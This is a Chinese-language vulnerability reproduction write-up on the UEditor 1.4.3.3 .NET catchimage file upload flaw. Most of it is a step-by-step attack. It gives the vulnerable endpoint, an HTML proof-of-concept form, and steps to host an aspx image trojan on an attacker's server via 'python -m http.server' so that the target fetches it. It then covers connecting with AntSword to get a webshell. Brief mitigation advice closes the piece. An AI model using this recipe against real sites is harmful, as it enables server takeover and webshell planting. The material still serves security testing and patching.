UEditor編輯器介紹
UEditor是由百度web前端研發部開發所見即所得富文本web編輯器,具有輕量,可定制,注重用戶體驗等特點,開源基於MIT協議,允許自由使用和修改代碼。
漏洞影響版本
漏洞影響版本:1.4.3.3(.net),其他php,jsp,asp版本不受此UEditor的漏洞的影響。
最新版本為1.4.3.3,並且已經不支持更新了。
漏洞復現過程
1.漏洞地址:
http://xxxxxxxx/Manage/js/ueditor/net/controller.ashx?action=catchimage
訪問后,返回下圖,證明存在漏洞。
2.構造上傳
<form action="http://xxxxxxxx/Manage/js/ueditor/net/controller.ashx?action=catchimage" enctype="multipart/form-data" method="POST">
<p>shell addr: <input type="text" name="source[]" /></p>
<input type="submit" value="Submit" />
</form>
3.制作aspx一句話圖片木馬
4.將木馬FTP上傳至遠程雲服務器:ftp://xx.xx.xx.xx/
5.通過python啟動http服務,python -m http.server 8989
6.雲服務器木馬地址:
http://xx.xx.xx.xx:8989/111.jpg
7.訪問poc.html,輸入雲服務器一句話圖片木馬地址,點sumbit,上傳木馬成功。
8.木馬地址
http://xxxxxx/Manage/js/ueditor/net/upload/image/20201112/6374077383629687503565050.aspx
9.蟻劍連接木馬,拿到webshell。
漏洞防范
1.目前臨時的漏洞修復是建議,把文件上傳目錄設置無腳本執行權限,uploadvideo、uploadimage、catchimage、uploadscrawl、uploadfile、等等目錄都設置為無腳本權限。
2.在百度UEditor官方沒有出補丁前,設置圖片目錄為只讀,禁止寫入。
3.修改程序的源代碼,對crawlerhandler源文件進行文件上傳格式的嚴格過濾與判斷。